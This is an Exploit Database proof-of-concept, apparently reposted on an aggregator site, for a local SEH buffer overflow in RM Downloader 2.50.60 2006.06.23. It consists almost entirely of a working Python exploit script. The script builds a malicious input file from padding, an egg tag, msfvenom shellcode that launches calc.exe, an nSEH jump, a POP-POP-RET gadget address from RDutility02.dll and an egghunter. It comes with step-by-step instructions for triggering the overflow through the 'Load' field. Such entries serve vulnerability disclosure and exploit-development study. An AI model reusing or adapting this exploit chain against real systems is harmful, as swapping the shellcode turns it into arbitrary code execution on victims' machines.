RM Downloader 2.50.60 2006.06.23 – ‘Load’ Local Buffer Overflow (EggHunter) (SEH) (PoC)

• Exploit Database
• 13 阅读

• 作者： Paras Bhatia
  日期： 2020-07-01
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/48628/

• # Exploit Title: RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC) 
  # Exploit Author: Paras Bhatia
  # Discovery Date: 2020-06-29
  # Vulnerable Software: RM Downloader
  # Software Link Download: https://github.com/x00x00x00x00/RMDownloader_2.50.60/raw/master/RMDownloader.exe
  # Version: 2.50.60 2006.06.23
  # Vulnerability Type: Local Buffer Overflow
  # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
  
  # Proof of Concept:
  
  # 1.- Run the python script, it will create a new file "RM_LCE.txt"
  # 2.- Copy the content of the new file 'RM_LCE.txt' to clipboard
  # 3.- Turn off DEP for RMDownloader.exe
  # 4.- Open 'RMDownloader.exe'
  # 5.- Go to 'Load' tab
  # 6.- Paste clipboard in 'Load' parameter
  # 7.- Click on button 'OK'
  # 8.- Two messageboxes will pop up, click OK
  # 9.- Calc.exe runs.
  
  #################################################################################################################################################
  
  #Python "RM_LCE.py" Code:
  
  f= open("RM_LCE.txt", "w")
  
  junk="\x41" * 336
  
  
  egg = "w00tw00t"
  
  # msfvenom -p windows/exec cmd=calc.exe --platform windows -f py-b "\x0a\x0d\x00"
  
  buf =""
  buf += "\xd9\xeb\xb8\xfa\x38\xad\x4f\xd9\x74\x24\xf4\x5a\x29"
  buf += "\xc9\xb1\x31\x83\xc2\x04\x31\x42\x14\x03\x42\xee\xda"
  buf += "\x58\xb3\xe6\x99\xa3\x4c\xf6\xfd\x2a\xa9\xc7\x3d\x48"
  buf += "\xb9\x77\x8e\x1a\xef\x7b\x65\x4e\x04\x08\x0b\x47\x2b"
  buf += "\xb9\xa6\xb1\x02\x3a\x9a\x82\x05\xb8\xe1\xd6\xe5\x81"
  buf += "\x29\x2b\xe7\xc6\x54\xc6\xb5\x9f\x13\x75\x2a\x94\x6e"
  buf += "\x46\xc1\xe6\x7f\xce\x36\xbe\x7e\xff\xe8\xb5\xd8\xdf"
  buf += "\x0b\x1a\x51\x56\x14\x7f\x5c\x20\xaf\x4b\x2a\xb3\x79"
  buf += "\x82\xd3\x18\x44\x2b\x26\x60\x80\x8b\xd9\x17\xf8\xe8"
  buf += "\x64\x20\x3f\x93\xb2\xa5\xa4\x33\x30\x1d\x01\xc2\x95"
  buf += "\xf8\xc2\xc8\x52\x8e\x8d\xcc\x65\x43\xa6\xe8\xee\x62"
  buf += "\x69\x79\xb4\x40\xad\x22\x6e\xe8\xf4\x8e\xc1\x15\xe6"
  buf += "\x71\xbd\xb3\x6c\x9f\xaa\xc9\x2e\xf5\x2d\x5f\x55\xbb"
  buf += "\x2e\x5f\x56\xeb\x46\x6e\xdd\x64\x10\x6f\x34\xc1\xee"
  buf += "\x25\x15\x63\x67\xe0\xcf\x36\xea\x13\x3a\x74\x13\x90"
  buf += "\xcf\x04\xe0\x88\xa5\x01\xac\x0e\x55\x7b\xbd\xfa\x59"
  buf += "\x28\xbe\x2e\x3a\xaf\x2c\xb2\x93\x4a\xd5\x51\xec"
  
  
  nseh ="\xeb\x06\x90\x90"
  
  #1002C531 5B POP EBX
  #1002C532 58 POP EAX
  #1002C533 C3 RETN
  #C:\Program Files\RM Downloader\RDutility02.dll
  
  
  seh="\x31\xc5\x02\x10"
  
  nops="\x90" * 20
  
  egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
  egghunter += "\x77\x30\x30\x74" # this is the marker/tag: w00t
  egghunter += "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
  
  
  
  payload = junk + egg + buf + nseh + seh + nops + egghunter 
  
  f.write(payload)
  f.close